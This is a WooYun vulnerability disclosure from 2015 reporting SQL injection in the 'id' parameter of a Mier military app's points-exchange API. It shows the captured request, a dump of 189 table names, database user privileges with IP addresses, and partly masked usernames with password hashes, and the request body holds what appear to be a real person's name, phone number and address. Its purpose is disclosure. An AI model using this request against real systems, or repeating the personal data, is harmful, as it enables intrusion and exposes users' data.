当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0122365

漏洞标题:米尔网某分站SQL高危注射(N多表)

相关厂商:米尔网

漏洞作者: DloveJ

提交时间:2015-06-24 15:43

修复时间:2015-08-08 15:44

公开时间:2015-08-08 15:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-24: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-08-08: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

米尔军事app某处注射。。俩个是一个厂商。。

1.jpg


2.png


app登陆积分兑换处

1.png


确定的同时抓包

POST /api/2.0.3/app_integral_exchange.php?plat=android&proct=mierapp&apiCode=1 HTTP/1.1
Content-Length: 235
Content-Type: application/x-www-form-urlencoded
Host: bbs.mier123.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; U; Android 4.4.2; zh-cn; MX4 Build/KOT49H) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
Accept-Encoding: gzip
uid=495505&id=81&count=1&name=%E5%88%98%E4%B8%9C&phone=15104869199&address=%E5%86%85%E8%92%99%E5%8F%A4%E5%8C%85%E5%A4%B4%E5%B8%82%E6%98%86%E9%83%BD%E4%BB%91%E5%8C%BA%E5%86%85%E8%92%99%E5%8F%A4%E7%A7%91%E6%8A%80%E5%A4%A7%E5%AD%A6&cat=0


id可注入

2.png


多库

1.png


我们跑下15年的库

Database: mier_2015_data
[189 tables]
+--------------------------------+
| `[Table]access` |
| `[Table]activities` |
| `[Table]activityapplies` |
| `[Table]addons` |
| `[Table]adminactions` |
| `[Table]admincustom` |
| `[Table]admingroups` |
| `[Table]adminnotes` |
| `[Table]adminsessions` |
| `[Table]advertisements` |
| `[Table]announcements` |
| `[Table]app_action_log` |
| `[Table]app_forums` |
| `[Table]app_login_log` |
| `[Table]app_member` |
| `[Table]app_post` |
| `[Table]app_share` |
| `[Table]armygroup` |
| `[Table]armygroupadmin` |
| `[Table]armygroupdonation` |
| `[Table]armygroupnotice` |
| `[Table]ask_category` |
| `[Table]ask_comment` |
| `[Table]ask_user_score` |
| `[Table]ask_user_status` |
| `[Table]ask` |
| `[Table]attachmentfields` |
| `[Table]attachments` |
| `[Table]attachpaymentlog` |
| `[Table]attachtypes` |
| `[Table]banned` |
| `[Table]bbcodes` |
| `[Table]caches` |
| `[Table]connect_memberbindlog` |
| `[Table]credit_logs` |
| `[Table]creditslog` |
| `[Table]crons` |
| `[Table]debateposts` |
| `[Table]debates` |
| `[Table]failedlogins` |
| `[Table]fam` |
| `[Table]family_domain` |
| `[Table]family_record` |
| `[Table]family_want` |
| `[Table]faqs` |
| `[Table]favoriteforums` |
| `[Table]favorites` |
| `[Table]favoritethreads` |
| `[Table]feeds` |
| `[Table]forum_post_tableid` |
| `[Table]forumfields` |
| `[Table]forumlinks` |
| `[Table]forumrecommend` |
| `[Table]forums` |
| `[Table]fruit_order` |
| `[Table]goods_exchange` |
| `[Table]goods` |
| `[Table]grab_signin` |
| `[Table]imagetypes` |
| `[Table]invites` |
| `[Table]itempool` |
| `[Table]laud_stamp` |
| `[Table]magiclog` |
| `[Table]magicmarket` |
| `[Table]magics` |
| `[Table]medallog` |
| `[Table]medals` |
| `[Table]member_connect` |
| `[Table]memberfields` |
| `[Table]membermagics` |
| `[Table]memberrecommend` |
| `[Table]members1` |
| `[Table]members` |
| `[Table]memberspaces` |
| `[Table]moderators` |
| `[Table]modworks` |
| `[Table]monument` |
| `[Table]myapp` |
| `[Table]myinvite` |
| `[Table]mynotice` |
| `[Table]myposts` |
| `[Table]mytasks` |
| `[Table]mythreads` |
| `[Table]navs` |
| `[Table]onlinelist` |
| `[Table]onlinetime` |
| `[Table]orders` |
| `[Table]paymentlog` |
| `[Table]pk_reply` |
| `[Table]pk` |
| `[Table]plugin_promotion` |
| `[Table]pluginhooks` |
| `[Table]plugins` |
| `[Table]pluginvars` |
| `[Table]polloptions` |
| `[Table]polls` |
| `[Table]postlogs` |
| `[Table]postposition` |
| `[Table]posts` |
| `[Table]profilefields` |
| `[Table]projects` |
| `[Table]promotions` |
| `[Table]prompt` |
| `[Table]promptmsgs` |
| `[Table]prompttype` |
| `[Table]purifyhylanda` |
| `[Table]quick_login` |
| `[Table]quiz_answer` |
| `[Table]quiz_cat` |
| `[Table]quiz_comment` |
| `[Table]quiz_user_log` |
| `[Table]quiz` |
| `[Table]ranks` |
| `[Table]ratelog` |
| `[Table]regips` |
| `[Table]relatedthreads` |
| `[Table]reportlog` |
| `[Table]request` |
| `[Table]rewardlog` |
| `[Table]rsscaches` |
| `[Table]searchindex` |
| `[Table]sessions` |
| `[Table]settings` |
| `[Table]sign_in` |
| `[Table]smilies` |
| `[Table]spacecaches` |
| `[Table]stats` |
| `[Table]statvars` |
| `[Table]styles` |
| `[Table]stylevars` |
| `[Table]tags` |
| `[Table]tasks` |
| `[Table]taskvars` |
| `[Table]templates` |
| `[Table]threadlogs` |
| `[Table]threads` |
| `[Table]threadsmod` |
| `[Table]threadtags` |
| `[Table]threadtypes` |
| `[Table]tradecomments` |
| `[Table]tradelog` |
| `[Table]tradeoptionvars` |
| `[Table]trades` |
| `[Table]typemodels` |
| `[Table]typeoptions` |
| `[Table]typeoptionvars` |
| `[Table]typevars` |
| `[Table]uc_admins` |
| `[Table]uc_applications` |
| `[Table]uc_badwords` |
| `[Table]uc_domains` |
| `[Table]uc_failedlogins` |
| `[Table]uc_feeds` |
| `[Table]uc_friends` |
| `[Table]uc_mailqueue` |
| `[Table]uc_memberfields` |
| `[Table]uc_members` |
| `[Table]uc_mergemembers` |
| `[Table]uc_newpm` |
| `[Table]uc_notelist` |
| `[Table]uc_pms` |
| `[Table]uc_protectedmembers` |
| `[Table]uc_settings` |
| `[Table]uc_sqlcache` |
| `[Table]uc_tags` |
| `[Table]uc_vars` |
| `[Table]uin_black` |
| `[Table]userapp` |
| `[Table]usergroups` |
| `[Table]validating` |
| `[Table]verify_code` |
| `[Table]war_log` |
| `[Table]war_threads` |
| `[Table]war_user_arms` |
| `[Table]war_user_hoon` |
| `[Table]war_user_status` |
| `[Table]war_user` |
| `[Table]warnings` |
| `[Table]words` |
| `[Table]xreports` |
| `[Table]xwb_bind_info` |
| `[Table]xwb_bind_thread` |
| `[Table]xwb_session` |
| m_sign_in |
| pre_common_member_login |
| pw_log_forums |
| pw_log_members |
| pw_log_posts |
| pw_log_threads |
+--------------------------------+


database management system users privileges
[*] 'bbs'@'10.3.3.%' [16]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE VIEW
privilege: DELETE
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: SELECT
privilege: SHOW VIEW
privilege: TRIGGER
privilege: UPDATE
[*] 'monitor'@'10.3.3.103' (administrator)
privilege: PROCESS
privilege: SELECT
privilege: SUPER
[*] 'monitor'@'122.225.105.180' (administra
privilege: PROCESS
privilege: SELECT
privilege: SUPER
[*] 'proxy1'@'10.3.3.%' (administrator) [28
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'rep'@'10.3.3.%' [1]:
privilege: REPLICATION SLAVE
[*] 'root'@'10.3.3.%' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'10.3.3.103' (administrator) [28
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'127.0.0.1' (administrator) [28]
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'::1' (administrator) [28]:
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'root'@'localhost' (administrator) [28]
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'test1'@'10.3.3.%' (administrator) [28]
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE
[*] 'test2'@'61.148.221.118' (administrator
privilege: ALTER
privilege: ALTER ROUTINE
privilege: CREATE
privilege: CREATE ROUTINE
privilege: CREATE TABLESPACE
privilege: CREATE TEMPORARY TABLES
privilege: CREATE USER
privilege: CREATE VIEW
privilege: DELETE
privilege: DROP
privilege: EVENT
privilege: EXECUTE
privilege: FILE
privilege: INDEX
privilege: INSERT
privilege: LOCK TABLES
privilege: PROCESS
privilege: REFERENCES
privilege: RELOAD
privilege: REPLICATION CLIENT
privilege: REPLICATION SLAVE
privilege: SELECT
privilege: SHOW DATABASES
privilege: SHOW VIEW
privilege: SHUTDOWN
privilege: SUPER
privilege: TRIGGER
privilege: UPDATE

漏洞证明:


id userid pwd
1 ji*ubu 4100da4***73e8cab4
4 a*p 18c22a3****6f5747
7 hu*ngcheng 612**08e4f0205797
8 ya**ai 0fd7be5**ff9da2a4f
9 xu*un 09c8864**f328e09bc
10 li*in dd90a9e**b2c011edb
11 wa*hun 6a60cc**11978bae948
281 jun*jia f6852cc**2f70c789c1
uid username password
1 sdmf**kasd 56137***51fd76c60fbed3a
2 米尔007 f1847424********04f3636d4c5fc9b
4 米尔 a2fcf4e******28ec8d0bcb19ad0e2
5 \xc7Řłż 46d6ac1a******93d562cfd10aff4
6 国风 7fa44e2a*****2fb30a466e051
7 米尔最高统帅部 be914c******5ee6c3c0d8b7557

2.png

修复方案:

版权声明:转载请注明来源 DloveJ@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)